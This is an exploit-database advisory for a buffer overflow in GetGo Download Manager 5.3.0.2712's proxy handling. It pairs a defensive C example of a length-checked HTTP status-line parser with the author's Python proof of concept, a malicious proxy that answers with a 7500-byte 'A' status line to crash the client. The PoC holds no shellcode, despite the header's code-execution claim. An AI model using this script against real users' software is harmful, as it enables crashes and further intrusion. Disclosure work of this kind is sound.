Vendor: GetGo Download Manager
By: devcoinfet
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: GetGo Download Manager
Affected Version From: 5.3.0.2712
Affected Version To: 5.3.0.2712
Patch Exists: YES
Related CWE: N/A
CPE: a:getgo_software:getgo_download_manager
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 8 64 bits
2018

Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712

A buffer overflow vulnerability exists in the proxy options of GetGo Download Manager 5.3.0.2712: a maliciously crafted response from a proxy can trigger an overflow. The victim must have a proxy selected in order to be vulnerable. To reproduce, the proxy IP in GetGo's proxy settings is set to the host running the script, and the proxy port is set there as well. When the victim then downloads any page or file, the program passes the request to the malicious host and incorrectly parses the response, triggering the overflow.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.
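
The page does not show GetGo's parsing code, so the following is an added C example (not the vendor's or the exploit author's code) of the general defence for this class of bug: a status-line parser that checks every length before copying and rejects a response shaped like the one described above. The names `parse_status_line` and `check_constructed_response` and the limits `MAX_STATUS_LINE` and `MAX_REASON` are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_STATUS_LINE 512  /* assumed cap on the whole status line */
#define MAX_REASON 64        /* assumed size of the fixed reason buffer */

struct http_status { int code; char reason[MAX_REASON]; };

/* Parse "HTTP/1.x NNN[ reason]\r\n" from len untrusted bytes. Returns 0, or
 * -1 if the line is missing, oversized or malformed; lengths checked first. */
int parse_status_line(const char *buf, size_t len, struct http_status *out)
{
    size_t eol = 0, scan = len < MAX_STATUS_LINE ? len : MAX_STATUS_LINE;
    while (eol + 1 < scan && !(buf[eol] == '\r' && buf[eol + 1] == '\n'))
        eol++;
    if (eol + 1 >= scan)
        return -1;                       /* no CRLF inside the cap */
    if (eol < 12 || memcmp(buf, "HTTP/1.", 7) != 0 || buf[8] != ' ' ||
        !isdigit((unsigned char)buf[9]) || !isdigit((unsigned char)buf[10]) ||
        !isdigit((unsigned char)buf[11]) || (eol > 12 && buf[12] != ' '))
        return -1;                       /* malformed version or code */
    size_t off = eol > 12 ? 13 : 12;     /* skip the space before reason */
    size_t rlen = eol - off;
    if (rlen >= sizeof out->reason)
        return -1;                       /* reason would not fit: reject */
    out->code = (buf[9] - '0') * 100 + (buf[10] - '0') * 10 + (buf[11] - '0');
    memcpy(out->reason, buf + off, rlen);
    out->reason[rlen] = '\0';
    return 0;
}

/* Constructed input: "HTTP/1.1 200 " + reason_len 'A' bytes + CRLF. */
int check_constructed_response(size_t reason_len)
{
    static char msg[8192];
    struct http_status st;
    if (reason_len > sizeof msg - 16) return -2;  /* sample too large */
    size_t n = (size_t)sprintf(msg, "HTTP/1.1 200 ");
    memset(msg + n, 'A', reason_len);
    memcpy(msg + n + reason_len, "\r\n", 2);
    return parse_status_line(msg, n + reason_len + 2, &st);
}

int main(void)
{
    printf("%d %d\n", check_constructed_response(2), check_constructed_response(7500));
    return 0;
}
```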

Exploit-DB raw data:

# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712
# Date: 01-02-2018
# Tested on Windows 8 64 bits
# Exploit Author: devcoinfet
# Contact: https://twitter.com/wabefet
# Software Link: http://www.getgosoft.com/getgodm/
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution

# To be vulnerable, the victim must have a proxy selected that will maliciously return data in its response.
# Select the proxy IP of the host running this script, in case you have a VM running the software.
# Set the port of the proxy in GetGo under proxy settings as well. Now when you download any page
# or any file, the program incorrectly parses the response and passes the request to the malicious host, triggering the overflow.

import socket
from time import sleep

default_evilbuffer = "A" * 7500

def main():
    ip = "10.10.10.6"
    port = 8055
    fuzz_test(ip, default_evilbuffer, port)

def fuzz_test(ip, payload, port):
    # Listen for a single proxy connection from the client under test
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((ip, port))
    s.listen(1)
    print("\n[+] Listening on %d ..." % port)

    cl, addr = s.accept()
    print("[+] Connection accepted from %s" % addr[0])
    print("[+] Pushing fuzz test to %s" % addr[0])

    # Status line whose reason phrase carries the oversized payload
    buffer = "HTTP/1.1 200 " + payload + "\r\n"

    print(cl.recv(1000))
    cl.send(buffer.encode("ascii"))
    print("[+] Sending Fuzzed buffer From Malicious Proxy: OK\n")
    print("[+] Payload type Default Buffer of 7500 A's")

    sleep(3)
    cl.close()
    s.close()

if __name__ == '__main__':
    main()